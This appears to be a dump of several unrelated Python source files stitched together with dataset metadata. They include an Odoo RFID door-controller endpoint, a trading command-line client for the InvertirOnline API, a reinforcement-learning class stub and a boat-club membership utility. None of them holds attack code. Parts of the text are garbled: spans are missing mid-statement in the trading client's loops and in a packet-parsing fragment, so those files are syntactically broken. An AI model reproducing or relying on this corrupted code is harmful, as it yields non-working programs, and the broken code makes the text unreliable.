'controller_id': controller.id,\n 'cmd': 'DB',\n 'status': 'Process',\n 'ex_timestamp': fields.Datetime.now(),\n }\n if not controller.is_relay_ctrl():\n cmd['cmd_data'] = '40%02X00' % (open_door + 4*(reader.number - 1))\n else:\n data = 0\n user_doors = card.get_owner().get_doors()\n for door in reader.door_ids:\n if door in user_doors:\n data |= 1 << (door.number - 1)\n cmd['cmd_data'] = '4000' + request.env['hr.rfid.door'].create_rights_int_to_str(data)\n event = {\n 'ctrl_addr': controller.ctrl_id,\n 'door_id': reader.door_id.id,\n 'reader_id': reader.id,\n 'card_id': card.id,\n 'event_time': self._get_ws_time_str(),\n 'event_action': '64',\n }\n self._get_card_owner(event, card)\n cmd = cmd_env.create(cmd)\n cmd_js = {\n 'status': 200,\n 'cmd': {\n 'id': cmd.controller_id.ctrl_id,\n 'c': cmd.cmd[:2],\n 'd': cmd.cmd_data,\n }\n }\n cmd.request = json.dumps(cmd_js)\n event['command_id'] = cmd.id\n ev_env.create(event)\n return cmd_js\n\n def _get_ws_time_str(self):\n return self._get_ws_time().strftime('%Y-%m-%d %H:%M:%S')\n\n def _get_ws_time(self):\n t = self._post['event']['date'] + ' ' + self._post['event']['time']\n try:\n ws_time = datetime.datetime.strptime(t, self._time_format)\n ws_time -= self._get_tz_offset(self._webstack)\n except ValueError:\n raise BadTimeException\n return ws_time\n\n @staticmethod\n def _get_tz_offset(webstack):\n tz_h = int(webstack.tz_offset[:3], 10)\n tz_m = int(webstack.tz_offset[3:], 10)\n return datetime.timedelta(hours=tz_h, minutes=tz_m)\n\n @staticmethod\n def _get_card_owner(event_dict: dict, card):\n if len(card.employee_id) == 0:\n event_dict['contact_id'] = card.contact_id.id\n else:\n event_dict['employee_id'] = card.employee_id.id\n\n @staticmethod\n def _send_command(command, status_code):\n command.status = 'Process'\n\n json_cmd = {\n 'status': status_code,\n 'cmd': {\n 'id': command.controller_id.ctrl_id,\n 'c': command.cmd[:2],\n 'd': command.cmd_data,\n }\n }\n\n if command.cmd == 'D1':\n if not command.controller_id.is_relay_ctrl():\n card_num = ''.join(list('0' + ch for ch in command.card_number))\n pin_code = ''.join(list('0' + ch for ch in command.pin_code))\n ts_code = str(command.ts_code)\n rights_data = '{:02X}'.format(command.rights_data)\n rights_mask = '{:02X}'.format(command.rights_mask)\n json_cmd['cmd']['d'] = card_num + pin_code + ts_code + rights_data + rights_mask\n else:\n card_num = ''.join(list('0' + ch for ch in command.card_number))\n rights_data = '%03d%03d%03d%03d' % (\n (command.rights_data >> (3*8)) & 0xFF,\n (command.rights_data >> (2*8)) & 0xFF,\n (command.rights_data >> (1*8)) & 0xFF,\n (command.rights_data >> (0*8)) & 0xFF,\n )\n if command.controller_id.mode == 3:\n rights_mask = '255255255255'\n else:\n rights_mask = '%03d%03d%03d%03d' % (\n (command.rights_mask >> (3*8)) & 0xFF,\n (command.rights_mask >> (2*8)) & 0xFF,\n (command.rights_mask >> (1*8)) & 0xFF,\n (command.rights_mask >> (0*8)) & 0xFF,\n )\n rights_data = ''.join(list('0' + ch for ch in rights_data))\n rights_mask = ''.join(list('0' + ch for ch in rights_mask))\n json_cmd['cmd']['d'] = card_num + rights_data + rights_mask\n\n if command.cmd == 'D7':\n dt = datetime.datetime.now()\n dt += WebRfidController._get_tz_offset(command.webstack_id)\n\n json_cmd['cmd']['d'] = '{:02}{:02}{:02}{:02}{:02}{:02}{:02}'.format(\n dt.second, dt.minute, dt.hour, dt.weekday() + 1, dt.day, dt.month, dt.year % 100\n )\n\n command.request = json.dumps(json_cmd)\n\n return json_cmd\n\n @http.route(['/hr/rfid/event'], type='json', auth='none', method=['POST'], 
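# Sketch of two encodings appearing in _send_command / _get_tz_offset above:
# card numbers are nibble-expanded ('123' -> '010203') before going into a
# D1 command, and the webstack's tz_offset string (e.g. '+0530') is split
# into hours and minutes.
import datetime

def nibble_expand(number: str) -> str:
    return ''.join('0' + ch for ch in number)

assert nibble_expand('123') == '010203'

def tz_offset(offset: str) -> datetime.timedelta:
    # the first three characters carry the sign and hours, the rest minutes
    return datetime.timedelta(hours=int(offset[:3], 10),
                              minutes=int(offset[3:], 10))

assert tz_offset('+0530') == datetime.timedelta(hours=5, minutes=30)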
csrf=False)\n def post_event(self, **post):\n print('post=' + str(post))\n t0 = time.time()\n if len(post) == 0:\n # Controllers with no odoo functionality use the dd/mm/yyyy format\n self._time_format = '%d.%m.%y %H:%M:%S'\n self._post = request.jsonrequest\n else:\n self._time_format = '%m.%d.%y %H:%M:%S'\n self._post = post\n _logger.debug('Received=' + str(self._post))\n\n if 'convertor' not in post:\n return self._parse_raw_data()\n\n self._vending_hw_version = '16'\n self._webstacks_env = request.env['hr.rfid.webstack'].with_user(1)\n self._webstack = self._webstacks_env.search(['|',('active', '=', True), ('active', '=', False),\n ('serial', '=', str(self._post['convertor'])) ])\n self._ws_db_update_dict = {\n 'last_ip': request.httprequest.environ['REMOTE_ADDR'],\n 'updated_at': fields.Datetime.now(),\n }\n try:\n if len(self._webstack) == 0:\n new_webstack = {\n 'name': 'Module ' + str(self._post['convertor']),\n 'serial': str(self._post['convertor']),\n 'key': self._post['key'],\n 'last_ip': request.httprequest.environ['REMOTE_ADDR'],\n 'updated_at': fields.Datetime.now(),\n 'available': 'a'\n }\n self._webstacks_env.create(new_webstack)\n return { 'status': 400 }\n\n if self._webstack.key != self._post['key']:\n self._report_sys_ev('Webstack key and key in json did not match')\n return { 'status': 400 }\n\n if not self._webstack.active:\n self._webstack.write(self._ws_db_update_dict)\n self._report_sys_ev('Webstack is not active')\n return { 'status': 400 }\n\n result = {\n 'status': 400\n }\n\n if 'heartbeat' in self._post:\n result = self._parse_heartbeat()\n elif 'event' in self._post:\n result = self._parse_event()\n elif 'response' in self._post:\n result = self._parse_response()\n\n self._webstack.write(self._ws_db_update_dict)\n t1 = time.time()\n _logger.debug('Took %2.03f time to form response=%s' % ((t1-t0), str(result)))\n print('ret=' + str(result))\n return result\n except (KeyError, exceptions.UserError, exceptions.AccessError, exceptions.AccessDenied,\n exceptions.MissingError, exceptions.ValidationError, exceptions.DeferredException,\n psycopg2.DataError, ValueError) as __:\n request.env['hr.rfid.event.system'].sudo().create([{\n 'webstack_id': self._webstack.id,\n 'timestamp': fields.Datetime.now(),\n 'error_description': traceback.format_exc(),\n 'input_js': json.dumps(self._post),\n }])\n _logger.debug('Caught an exception, returning status=500 and creating a system event')\n print('Caught an exception, returning status=500 and creating a system event')\n return { 'status': 500 }\n except BadTimeException:\n t = self._post['event']['date'] + ' ' + self._post['event']['time']\n ev_num = str(self._post['event']['event_n'])\n controller = self._webstack.controllers.filtered(lambda r: r.ctrl_id == self._post['event']['id'])\n sys_ev_dict = {\n 'webstack_id': self._webstack.id,\n 'controller_id': controller.id,\n 'timestamp': fields.Datetime.now(),\n 'event_action': ev_num,\n 'error_description': 'Controller sent us an invalid date or time: ' + t,\n 'input_js': json.dumps(self._post),\n }\n request.env['hr.rfid.event.system'].sudo().create(sys_ev_dict)\n _logger.debug('Caught a time error, returning status=200 and creating a system event')\n print('Caught a time error, returning status=200 and creating a system event')\n return { 'status': 200 }\n\n def _parse_raw_data(self):\n if 'serial' in self._post and 'security' in self._post and 'events' in self._post:\n return self._parse_barcode_device()\n\n return { 'status': 200 }\n\n def _parse_barcode_device(self):\n 
post = self._post\n ret = request.env['hr.rfid.raw.data'].create([{\n 'do_not_save': True,\n 'identification': post['serial'],\n 'security': post['security'],\n 'data': json.dumps(post),\n }])\n\n ret_data = ret.return_data\n\n if ret.do_not_save is True:\n ret.unlink()\n\n return json.loads(ret_data)\n","sub_path":"hr_rfid/controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":34540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"25293708","text":"# Python https://docs.python.org/3.1/tutorial/datastructures.html\n\nname = \"Dan\" # string\nage = 24 # int\nfavorites = [\"Cycling\", \"Eatsies\", \"Smiling\"] # list of strings\n\n# object (dictionary = key : value)\nperson = {\n 'name' : name,\n 'age' : age,\n 'favorites' : favorites\n}\n\nprint(person)\n","sub_path":"basics.py","file_name":"basics.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"151498106","text":"#!/usr/bin/env python3\n#Autor:JoséFacundoBogado, dedicado a Clara(I❤U)\nimport requests\nimport json\nimport sys\nimport os\nimport time\n\ndef borrarPant():\n if os.name == \"posix\":\n os.system (\"clear\")\n elif os.name == \"ce\" or os.name == \"nt\" or os.name == \"dos\":\n os.system (\"cls\")\n\ndef menu():\n print('FlashTrading 0.1 (pre-alfa)')\n print('''¿Que desea hacer? :\n [0] Estado de Cuenta\n [1] Ver Portafolio\n [2] Consultar la cotización de un titulo\n [3] Ver operaciones\n [4] Comprar/Vender\n [5] Ver Paneles de cotizaciones\n [6] Serie historica\n [7] Calculadora de bonos\n [8] Acerca de...\n [9] Salir\n ''')\n n = input('(Ingrese el número):\\t')\n borrarPant()\n if n=='0':\n estado()\n elif n=='1':\n miportafolio()\n elif n=='2':\n consulta()\n elif n=='3':\n operaciones()\n elif n=='5':\n mostrarpanel()\n elif n=='8':\n acercade()\n elif n=='9':\n salir()\n else:\n borrarPant()\n print('\\n\\n\\tERROR: Ingrese el numero de la opción que desee')\n time.sleep(2)\n menu()\n\ndef estado():\n print('FlashTrading 0.1 (pre-alfa)')\n data = {\n 'Authorization': c,\n }\n r = requests.get(\"https://api.invertironline.com/api/estadocuenta\", headers=data)\n estado = json.loads(r.text)\n n=0\n print(\n '\\nEstado de cuenta nº: ', estado['cuentas'][0]['numero'],\n '\\n\\t\\t\\t\\t[Total en Pesos:$',estado['totalEnPesos'],']\\n',\n '\\nCuenta',estado['cuentas'][0]['tipo'],\n '\\t[Total:\\t$',estado['cuentas'][0]['total'],']\\n',\n '\\n\\t\\tActivos Valorizados\\t\\t\\t$',estado['cuentas'][0]['titulosValorizados'],\n '\\n\\t\\tComprometido\\t\\t\\t\\t$',estado['cuentas'][0]['comprometido'],\n '\\n\\t\\tDisponible para operar\\t\\t\\t$','{:.2f}'.format((estado['cuentas'][0]['saldos'][0]['saldo']+estado['cuentas'][0]['saldos'][1]['saldo']+estado['cuentas'][0]['saldos'][2]['saldo']+estado['cuentas'][0]['saldos'][3]['saldo'])-estado['cuentas'][0]['comprometido']),\n '\\n\\t\\tDisponible en cuenta\\t\\t\\t$','{:.2f}'.format(estado['cuentas'][0]['disponible']),\n '\\n\\t\\t\\tSaldo a acreditarse (Inmediato) $',estado['cuentas'][0]['saldos'][1]['saldo'],\n '\\n\\t\\t\\tSaldo a acreditarse (24hs)\\t$',estado['cuentas'][0]['saldos'][0]['saldo'],\n '\\n\\t\\t\\tSaldo a acreditarse (48hs)\\t$',estado['cuentas'][0]['saldos'][1]['saldo'],\n '\\n\\t\\t\\tSaldo a acreditarse (72hs)\\t$',estado['cuentas'][0]['saldos'][2]['saldo'],\n '\\n\\t\\t\\tSaldo a acreditarse (+72hs)\\t$',estado['cuentas'][0]['saldos'][3]['saldo'],\n 
'\\n\\nCuenta',estado['cuentas'][1]['tipo'],\n '\\t[Total:\\tU$S',estado['cuentas'][1]['total'],']\\n',\n '\\n\\t\\tActivos Valorizados\\t\\t\\tU$S',estado['cuentas'][1]['titulosValorizados'],\n '\\n\\t\\tComprometido\\t\\t\\t\\tU$S',estado['cuentas'][1]['comprometido'],\n '\\n\\t\\tDisponible para operar\\t\\t\\t$','{:.4f}'.format(estado['cuentas'][1]['saldos'][1]['saldo']+estado['cuentas'][1]['saldos'][2]['saldo']+estado['cuentas'][1]['saldos'][3]['saldo']-estado['cuentas'][1]['comprometido']),\n '\\n\\t\\tDisponible en cuenta\\t\\t\\tU$S',estado['cuentas'][1]['disponible'],\n '\\n\\t\\t\\tSaldo a acreditarse (Inmediato) U$S',estado['cuentas'][1]['saldos'][1]['saldo'],\n '\\n\\t\\t\\tSaldo a acreditarse (24hs)\\tU$S',estado['cuentas'][1]['saldos'][0]['saldo'],\n '\\n\\t\\t\\tSaldo a acreditarse (48hs)\\tU$S',estado['cuentas'][1]['saldos'][1]['saldo'],\n '\\n\\t\\t\\tSaldo a acreditarse (72hs)\\tU$S',estado['cuentas'][1]['saldos'][2]['saldo'],\n '\\n\\t\\t\\tSaldo a acreditarse (+72hs)\\tU$S',estado['cuentas'][1]['saldos'][3]['saldo'],'\\n',\n\n )\n #+estado['cuentas'][0]['saldos'][1]['saldo']+estado['cuentas'][0]['saldos'][2]['saldo']+estado['cuentas'][0]['saldos'][3]['saldo']-estado['cuentas'][0]['comprometido'],\n a=input('presione enter para ir al menu de opciones')\n borrarPant()\n menu()\n\ndef miportafolio():\n print('FlashTrading 0.1 (pre-alfa)')\n data = {\n 'Authorization': c,\n }\n r = requests.get(\"https://api.invertironline.com/api/portafolio\", headers=data)\n port = json.loads(r.text)\n print('Portafolio:')\n n=0\n while n< len(port['activos']):\n ls = port['activos'][n]['titulo']['descripcion']\n ls2 = port['activos'][n]['ultimoPrecio']\n ls3 = port['activos'][n]['cantidad']\n ls4 = port['activos'][n]['titulo']['moneda']\n ls5 = port['activos'][n]['gananciaPorcentaje']\n ls6 = port['activos'][n]['valorizado']\n ls7 = port['activos'][n]['titulo']['simbolo']\n ls8 = port['activos'][n]['variacionDiaria']\n ls9 = port['activos'][n]['gananciaDinero']\n print(ls,'\\n\\t\\tSimbolo:\\t\\t',ls7,'\\n\\t\\tNominales:\\t\\t',ls3,'\\n\\t\\tCotización:\\t\\t $',\n ls2,ls4,'\\n\\t\\tVariacion desde Compra:\\t',ls5,'%','\\n\\t\\tValorizado:\\t\\t $',ls6,ls4,\n '\\n\\t\\tVariación Diaria:\\t',ls8,'%','\\n\\t\\tGanancia Nominal:\\t $',ls9,ls4,'\\n')\n n+=1\n a=input('presione enter para ir al menu de opciones')\n borrarPant()\n menu()\n\ndef consulta():\n print('FlashTrading 0.1 (pre-alfa)\\n\\n')\n merc='bcba'\n simb=input('\\nIngrese el simbolo del titulo que desea consultar\\n(ejemplo: pamp, alua, cres):\\t')\n host='https://api.invertironline.com/api/'+merc+'/Titulos/'+simb+'/cotizacion'\n host2='https://api.invertironline.com/api/'+merc+'/Titulos/'+simb\n data = {\n 'Authorization': c,\n 'mercado':merc,\n 'simbolo':simb,\n 'model.simbolo':simb,\n 'model.mercado':merc\n }\n r = requests.get(host, headers=data)\n r2 = requests.get(host2, headers=data)\n borrarPant()\n cotizacion=json.loads(r.text)\n datos=json.loads(r2.text)\n print(datos['descripcion'],' - [',datos['simbolo'],']\\n',\n '\\núltimo precio: \\t$',cotizacion['ultimoPrecio'],'\\t\\tApertura: $',cotizacion['apertura'],'\\tMáximo: $',cotizacion['maximo'],'\\tMínimo: $',cotizacion['minimo'],\n '\\nCierre Anterior: ',cotizacion['cierreAnterior'],\n '\\nVariación:\\t', cotizacion['variacion'],'%',\n '\\n')\n print('-CAJA DE PUNTAS-\\n')\n print('\\tCOMPRA\\t\\tVENTA')\n print('Cantidad','Precio','\\tPrecio',' Cantidad')\n n=0\n while n< len(cotizacion['puntas']):\n 
print('{:^8}'.format(str(int(cotizacion['puntas'][n]['cantidadCompra']))),'$',cotizacion['puntas'][n]['precioCompra'],\n '\\t{:9}'.format('$'+str(cotizacion['puntas'][n]['precioVenta'])),'{:^8}'.format(str(int(cotizacion['puntas'][n]['cantidadVenta']))))\n n+=1\n k=input('presione enter para volver al menú')\n borrarPant()\n menu()\n\ndef mostrarpanel():\n hostpanel='https://api.invertironline.com/api/Cotizaciones/acciones/merval/argentina?panelCotizacion.instrumento=acciones&panelCotizacion.panel=merval&panelCotizacion.pais=argentina&api_key='+c\n body={\n 'Authorization':c,\n 'panelCotizacion.instrumento':'acciones',\n 'panelCotizacion.panel':'merval',\n 'panelCotizacion.pais':'argentina'\n }\n panel = requests.get(hostpanel, headers=body)\n merv=json.loads(panel.text)\n n=0\n borrarPant()\n print('''\n----------------------------------[[MERVAL]]-----------------------------------------------\n-------------------------------------------------------------------------------------------\n Último Variación -----Compra----Puntas----Venta----- Apertura Máximo Mínimo Cierre Cantidad Monto\nSimbolo Precio % Cantidad Precio - Precio Cantidad Anterior Operaciones Operado\n''')\n while n7}'.format('$'+str(merv['titulos'][n]['puntas']['precioVenta'])),'{:^10}'.format(str(int(merv['titulos'][n]['puntas']['cantidadVenta']))),\n '{:8}'.format('$ '+str(merv['titulos'][n]['apertura'])),'{:8}'.format('$ '+str(merv['titulos'][n]['maximo'])),'{:9}'.format('$ '+str(merv['titulos'][n]['minimo'])),\n '{:9}'.format('$ '+str(merv['titulos'][n]['ultimoCierre'])),'{:12}'.format(str(int(merv['titulos'][n]['cantidadOperaciones']))),'{:9}'.format('$ '+str(merv['titulos'][n]['volumen']))\n )\n n+=1\n w=input('presione enter para volver al menú')\n menu()\n\ndef operaciones():\n print('FlashTrading 0.1 (pre-alfa)\\n')\n print('''Seleccione que tipo de operaciones desea:\n [1] Todas\n [2] Pendientes\n [3] Terminadas\n [4] Canceladas\n ''')\n tipo=input('Ingrese la opción: ')\n if tipo=='1':\n tipo='todas'\n elif tipo=='2':\n tipo=\"pendientes\"\n elif tipo=='3':\n tipo='terminadas'\n elif tipo=='4':\n tipo='canceladas'\n else:\n borrarPant()\n print('Error. Ingrese un numero del 1 al 4')\n time.sleep(2)\n operaciones()\n borrarPant()\n #print(tipo)\n print('Ingrese la fecha desde la que desea consultar. (formato \"aaaa-mm-dd\", ejemplo: 2018-07-24)')\n print('***Si deja vacio se tomara el último mes por defecto')\n fechadesde=input()\n print('\\nIngrese la fecha hasta la que desea consultar. (formato \"aaaa-mm-dd\", ejemplo: 2019-01-06)')\n print('***Si deja vacio se tomara hoy por defecto')\n fechahasta=input()\n data = {\n 'Authorization': c,\n 'filtro.numero':'',\n 'filtro.estado':tipo,\n 'filtro.fechaDesde':fechadesde,\n 'filtro.fechaHasta':fechahasta\n }\n url='https://api.invertironline.com/api/operaciones?filtro.estado='+tipo+'&filtro.fechaDesde='+fechadesde+'&filtro.fechaHasta='+fechahasta\n r = requests.get(url, headers=data)\n operetas = json.loads(r.text)\n n=0\n print('''\n | Nº de |Fecha de | Tipo | Estado | Símbolo | Cantidad | Precio | Fecha | Monto | Precio |\n |trans. 
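# Hedged sketch of the API-call pattern used throughout FlashTrading above:
# every endpoint is a GET against api.invertironline.com with the auth token
# ('c' in this script) passed in the Authorization header. The token value
# and endpoint below are placeholders.
import json
import requests

def iol_get(path, token):
    r = requests.get('https://api.invertironline.com/api/' + path,
                     headers={'Authorization': token})
    return json.loads(r.text)

# e.g. iol_get('bcba/Titulos/pamp/cotizacion', c)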
| orden | | | | /Monto | orden | Operada | Operado | operado |\n ---------------------------------------------------------------------------------------------------------------''')\n while n 0.05:\r\n\t\tmaster_list.append('|')\r\n\tprev_ts = timestamp\r\n\r\n# for item in master_list:\r\n# \tif item == '|':\r\n# \t\tprint()\r\n# \telse:\r\n# \t\tprint(hex(item), end=' ')","sub_path":"packet_parse/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"449049339","text":"from collections import deque\nimport gym\n\n\nclass DQN:\n \"\"\"\n Adapted from https://gist.github.com/yashpatel5400/049fe6f4372b16bab5d3dab36854f262#file-mountaincar-py\n https://towardsdatascience.com/reinforcement-learning-w-keras-openai-dqns-1eed3a5338c\n\n Implements a simple fully connected model with dropout to learn the behaviour from observations.\n Can solve the following environments:\n + MountainCar-v0\n \"\"\"\n\n def __init__(self,\n env=\"MountainCar-v0\",\n gamma=0.95,\n epsilon=1.0,\n epsilon_min=0.01,\n epsilon_decay=0.995,\n learning_rate=0.01,\n replay_buffer_size=2000,\n tau=0.05):\n\n self.env = gym.make(env)\n\n print(\"Action space: {}\".format(self.env.action_space))\n print(\"Observation/State space: {}\".format(self.env.observation_space))\n\n # instead of always learning from the most recent trial, we random sample from the replay buffer. This helps\n # with convergence when using NN function approximators, since it assures that our samples (trials) are\n # independently distributed. Also, this enables us to learn while considering the best action to take,\n # independently of the most recent trial.\n self.replay_buffer = deque(maxlen=replay_buffer_size)\n\n self.gamma = gamma # future reward discount factor (< 1)\n self.epsilon = epsilon # probability of exploring (taking random action)\n\n # we want to explore more in the beginning, so init with high epsilon and let epsilon decay over time\n self.epsilon_decay = epsilon_decay\n\n self.epsilon_min = epsilon_min # the minimum exploration probability we want to maintain\n self.learning_rate = learning_rate\n\n self.tau = tau # the factor by how much slower we update the weights of the target network\n\n # this is the model used to do the actual predictions for the action\n self.model = None\n\n # deepmind's trick for better convergence in complex environments: https://arxiv.org/abs/1312.5602\n # this is the final model will use after training, which learns slower the training model.\n # since we train on each time step, we also change the goal on each timestep. This means that the gradients\n # change a lot, which makes it hard to converge.\n self.target_model = None\n\n","sub_path":"algos/dqn.py","file_name":"dqn.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"221685562","text":"#!/usr/bin/env python3\n\n# File: utils.py\n\n\"\"\"\n\"utils.py\" is an utility providing functionality for usage and\nmaintanance of the Bolinas Rod and Boat Club membership records.\nMost commands deal with a csv file named \"./Data/memlist.csv\" so for\nthese it is the default input file.\nLabels and Envelopes (along with the '-P ' option) have\nbeen deprecated but the code left in place incase anyone ever\nwishes to revive them. 
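# The comments in the DQN class above describe DeepMind's target-network
# trick; a minimal sketch of the corresponding soft update, assuming
# Keras-style models exposing get_weights()/set_weights() (the class here
# leaves self.model / self.target_model as None, so this is illustrative):
def soft_update(model, target_model, tau=0.05):
    weights = model.get_weights()
    target_weights = target_model.get_weights()
    blended = [tau * w + (1.0 - tau) * tw
               for w, tw in zip(weights, target_weights)]
    target_model.set_weights(blended)  # target lags the online model by tau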
Current usage replaces them with emails and\nletters (which can be prepared using the 'prepare_mailing' command.)\nConsult the README file for further info.\n\nUsage:\n ./utils.py [ ? | --help | --version]\n ./utils.py ck_data [-O -d -i -A -S -X -C -o ]\n ./utils.py show [-O -i -A -S -o ]\n ./utils.py names_only [-O -w -i -o ]\n ./utils.py report [-O -i -A -S -o ]\n ./utils.py stati [-O -D -M -B --mode -i -A -S -o ]\n ./utils.py zeros [-O -i -o -o ]\n ./utils.py extra_charges [-O -w -f -i -o -j ]\n ./utils.py payables [-O -T -w -i -o ]\n ./utils.py show_mailing_categories [-O -T -w -o ]\n ./utils.py prepare_mailing --which [-O --oo -p -i -j --dir --cc --bcc ATTACHMENTS...]\n ./utils.py thank [-t <2thank> -O -p -i -j --dir -o -e ]\n ./utils.py display_emails [-O] -j [-o ]\n ./utils.py send_emails [-O --mta --emailer ] -j \n ./utils.py print_letters --dir [-O --separator -o outfile]\n ./utils.py emailing [-O -i -F ] --subject -c [ATTACHMENTS...]\n ./utils.py restore_fees [-O -i -X -o -e ]\n ./utils.py fee_intake_totals [-O -i -o -e ]\n ./utils.py (labels | envelopes) [-O -i -P -o -x ]\n ./utils.py wip [-O -o 2check]\n ./utils.py new_db -F function [-O -i -o -e ]\n\nOptions:\n -h --help Print this docstring. Best piped through pager.\n --version Print version.\n -A Applicant data file.\n --bcc Comma separated listing of bcc recipients\n --cc Comma separated listing of cc recipients\n -c The name of a file containing the body of an email.\n -C Contacts data file.\n -d Include details: fee inconsistency for ck_data,\n -dir The directory to be created and/or read\n containing letters for batch printing.\n -e Specify name of a file to which an error report\n can be written. [default: stdout]\n --emailer Use bash (via smtp or mutt) or python to send\n emails. [default: python]\n -f Specify output format of 'extra_charges' command.\n Possible choices are:\n 'table' listing of names /w fees tabulated (=> 2 columns.)\n 'listing' same format as Data/extra_fees.txt\n 'listings' side by side lists (best use landscape mode.)\n [default: table]\n -F Name of function to apply. (new_db command)\n -i Specify file used as input. Usually defaults to\n the MEMBERSHIP_SPoT attribute of the Club class.\n -D include demographic data } These pertain\n -M include meeting dates } to applicant\n -B include backers/sponsors } reports.\n -j Specify a json formated file (whether for input or output\n depends on context.)\n --mode In stati command signals stati to show:\n If not specified, all stati are reported.\n | --mode :\n only applicants are reported\n | --mode : only report stati listed.\n --mta Specify mail transfer agent to use. Choices are:\n clubg club's gmail account [default: clubg]\n akg my gmail account\n easy my easydns account\n -O Show Options/commands/arguments. Used for debugging.\n -o Specify destination. Choices are stdout, printer, or\n the name of a file. [default: stdout]\n --oo Owing_Only: Only consider members with dues/fees outstanding.\n (Sets owing_only attribute of instance of Club.)\n -P This option will probably be redacted since old\n methods of mailing are no longer used.\n Defaults are A5160 for labels & E000 for envelopes.\n -p Deals with printer variablility; ensures correct\n alignment of text when printing letters. [default: X6505_e1]\n -s Report only the stati listed (separated by\n member.SEPARATOR.\n -S Specify file from which to retrieve sponsors.\n --separator A string. 
[default: \\f]\n --subject The subject line of an email.\n -t <2thank> A csv file in same format as memlist.csv showing\n recent payments. Input for thank_cmd.\n [default: Info/2thank.csv]\n -T Present data in columns (a Table) rather than a long list.\n Used with the 'payables' and 'show_mailing_categories\n command. May not have much effect without setting -w\n to a high number.\n -w Maximum number of characters per line in output.\n [default: 95]\n --which Specifies type/subject of mailing.\n -x Used by commands not in use. (Expect redaction)\n -X Extra Fees data file.\n\nCommands:\n When run without a command, suggests ways of getting help.\n ck_data: Checks all the club's data bases for consistency.\n Assumes (user must assert) a fresh export of the gmail\n contacts list. Options:\n | -d Include fee inconsistencies (which are expected\n when some have paid.)\n show: Returns membership demographics a copy of which can then\n be sent to the web master for display on the web site.\n names_only: Returns a listing of members and applicants- names\n only, without any demographics. If -w is 0, it's a single\n column, otherwise output is in tabular.\n report: Prepares a 'Membership Report\".\n stati: Returns a listing of stati (entries in 'status' field.)\n if set can be 'applicants' (Applicants only will be\n shown) or a member.SEPARATOR separated set of stati\n (indicating which stati to show.)\n May also include any combination of -D, -M, -S to\n include adress/demographics, meeting dates &/or sponsors\n for applicants.\n usps: Creates a csv file containing names and addresses of\n members without an email address who therefore receive Club\n minutes by post. Also includes any one with a 'be' or an 's'\n status (... a mechanism for sending a copy to the secretary.)\n extra_charges: Reports on members paying extra charges (for\n kayak storage, mooring &/or dock usage.)\n | -f -specify listing, listings or table format.\n | -w -specify maxm # of chars per line in output.\n | -j -creat a json file. (This was\n but is no longer required by the restore_fees_cmd.)\n payables: Reports on non zero money fields.\n | -T Present as a table rather than a listing.\n | -w Maximum number of characters per line if -T.\n show_mailing_categories: Sends a list of possible entries for the\n '--which' parameter required by the prepare_mailings command.\n (See the 'content_types' dict in content.py.)\n prepare_mailing: Demands a <--which> argument to specify the\n content and the custom function(s) to be used. Try the\n 'show_mailing_categories' command for a list of choices.\n The command line arguments may end with zero or more names\n of files which are to be added as attachments to the emails.\n Other parameters have defaults set.\n '--oo' Send request for fee payment only to those with an\n outstanding balance. This is relevant only to mailings\n relating to dues and fees. Without this option mailings go\n to all members (including those with credit or 0 balance.\n '-p ' specifies printer to be used for letters.\n '-i ' membership data csv file.\n '-j ' where to dump prepared emails.\n '---dir ' where to file letters.\n thank: Reads the file specified by -t , applies payments\n specified there in to the -i and prepares thank you\n letter/email acknowledging receipt of payment and showing\n current balance(s.) 
See prepare_mailing command for further\n details.\n display_emails: Provides an opportunity to proof read the emails.\n send_emails: Sends out the emails found in the -j .\n Each mta has its own security requirements and each emailer\n has its own way of implementing them. Check the\n Notes/emailREADME for details. Note that not all\n combinations of mta and emailer are working but the following\n does: \"--mta clubg --emailer python\".\n within the ./Notes directory (./Notes/msmtprc.)\n print_letters: Sends the files contained in the directory\n specified by the --dir parameter. Depricated in favour of\n simply using the lpr utility: $ lpr ./Data/MailDir/*\n restore_fees: Use this command to populate each member's record\n with what they will owe for the next club year. Respects any\n existing credits. Best done after all dues and fees have been\n paid. (Will abort if any dues or fees are still outstanding.)\n Results are either placed into a file specified by the '-o'\n option (if provided) or placed into a file named as a\n concatination of \"new_\" and the input file. One can then\n mannually check the new file and rename it if all is well.\n emailing: Initially developed to allow sending of attachments.\n Since attachments are now possible using the send_mailing\n command (at least with emailer python) this command will\n most likely be redacted.\n fee_intake_totals: Input file should be a 'receipts' file with a\n specific format. It defaults to 'Data/receipts-YYYY.txt'\n where YYYY is the current year. Output yields subtotals and\n the grand total which can be copy/pasted into the 'receipts'\n file.\n labels: print labels. | default: -P A5160 | Both\n envelopes: print envelopes. | default: -P E000 | redacted.\n wip: \"work in progress\" Used for development/testing.\n\"\"\"\n\nimport os\nimport shutil\nimport csv\nimport codecs\nimport sys\nimport time\nimport random\nimport json\nimport subprocess\nfrom docopt import docopt\nimport sys_globals as glbs\nimport member\nimport helpers\nimport content\nimport data\nimport Pymail.send\nimport Bashmail.send\nfrom rbc import Club\n\n\nTEXT = \".txt\" # } Used by \nCSV = \".csv\" # } command.\n\nTEMP_FILE = \"2print.temp\" # see function\n\nargs = docopt(__doc__, version=glbs.VERSION)\nfor arg in args:\n if type(args[arg]) == str:\n if args[arg] and (args[arg][0] == '='):\n args[arg] = args[arg][1:]\ntry:\n max_width = int(args['-w'])\nexcept ValueError:\n print(\n \"Value of '-w' command line argument must be an integer.\")\n sys.exit()\nif args['-O']:\n print(\"Arguments are...\")\n res = sorted([\"{}: {}\".format(key, args[key]) for key in args])\n ret = helpers.tabulate(res, max_width=max_width, separator=' ')\n print('\\n'.join(ret))\n response = input(\"...end of arguments. Continue? \")\n if response and response[0] in 'yY':\n pass\n else:\n sys.exit()\n\nif args[\"-p\"] not in content.printers.keys():\n print(\"Invalid '-p' parameter! 
